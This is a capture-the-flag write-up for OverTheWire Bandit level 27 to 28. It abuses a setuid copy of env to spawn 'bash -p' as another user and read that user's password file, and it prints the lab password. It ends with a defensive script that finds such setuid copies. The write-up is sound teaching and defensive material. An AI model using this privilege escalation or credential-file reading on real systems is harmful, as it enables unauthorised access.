
OverTheWire - Bandit: Level 27 to Level 28


Good job getting a shell! Now hurry and grab the password for bandit27!

Using the shell created in the previous level, we can find an executable with the SUID bit set.

-rwsr-x--- 1 bandit27 bandit26 14876 Oct 5 06:19 bandit27-do

Let’s take a look at the usage of this executable:

$ ./bandit27-do --help
Usage: env [OPTION]... [-] [NAME=VALUE]... [COMMAND [ARG]...]
Set each NAME to VALUE in the environment and run COMMAND.

Mandatory arguments to long options are mandatory for short options too.
 -i, --ignore-environment start with an empty environment
 -0, --null end each output line with NUL, not newline
 -u, --unset=NAME remove variable from the environment
 -C, --chdir=DIR change working directory to DIR
 -S, --split-string=S process and split S into separate arguments;
 used to pass multiple arguments on shebang lines
 --block-signal[=SIG] block delivery of SIG signal(s) to COMMAND
 --default-signal[=SIG] reset handling of SIG signal(s) to the default
 --ignore-signal[=SIG] set handling of SIG signals(s) to do nothing
 --list-signal-handling list non default signal handling to stderr
 -v, --debug print verbose information for each processing step
 --help display this help and exit
 --version output version information and exit

A mere - implies -i. If no COMMAND, print the resulting environment.

SIG may be a signal name like 'PIPE', or a signal number like '13'.
Without SIG, all known signals are included. Multiple signals can be
comma-separated.

GNU coreutils online help: <https://www.gnu.org/software/coreutils/>
Full documentation <https://www.gnu.org/software/coreutils/env>
or available locally via: info '(coreutils) env invocation'

The first line of the help output shows that this is a version of the /usr/bin/env executable, a tool that runs a command in a modified environment. Because the binary is setuid bandit27, it can be used to start a bash shell as bandit27.

$ ./bandit27-do /bin/bash -p
$ whoami
bandit27
$ cat /etc/bandit_pass/bandit27
YnQpBuifNMas1hcUFk70ZmqkhUU2EuaS

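Note the -p flag passed to bash. It is needed so that bash does not drop the elevated privileges: when bash starts with an effective user ID that differs from the real user ID, it resets the effective ID to the real one unless -p is given.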
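
The same misconfiguration from the defender's side, as an added example that is not part of the original writeup: a small audit function that flags setuid files which are byte-identical copies of binaries that run arbitrary commands by design, the way bandit27-do is a copy of env. The function name suid_copies and the reference list are assumptions made for this illustration.

```shell
#!/bin/sh
# Added example (not from the writeup): flag setuid files that are
# byte-identical copies of binaries which run arbitrary commands by design.
# Run as root so every setuid file is readable; unreadable files are
# skipped silently because cmp -s then returns an error status.

# Assumed, illustrative reference list; extend it for your own systems.
REFERENCE_BINS="env sh bash dash nice timeout"

# suid_copies DIR...
# Prints "<file><TAB>identical to <reference>" for every setuid regular file
# under DIR whose content equals one of the reference binaries.
suid_copies() {
    find "$@" -xdev -type f -perm -4000 2>/dev/null |
    while IFS= read -r file; do
        for name in $REFERENCE_BINS; do
            # Resolve the reference through PATH; skip names not installed.
            ref=$(command -v "$name" 2>/dev/null) || continue
            # command -v prints a bare name for builtins; require a real file.
            [ -f "$ref" ] || continue
            # The file name is irrelevant (bandit27-do vs env): compare content.
            if cmp -s "$file" "$ref"; then
                printf '%s\tidentical to %s\n' "$file" "$ref"
                break
            fi
        done
    done
}

# When called with directories as arguments, audit them.
if [ "$#" -gt 0 ]; then
    suid_copies "$@"
fi
```

A hit on anything other than a deliberately installed system binary deserves a closer look at who owns the file and which group may execute it.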

Categories: #/writeups/; #/overthewire/

Tags: #/security/; #/hacking/; #/bash/; #/linux/; #/ctf/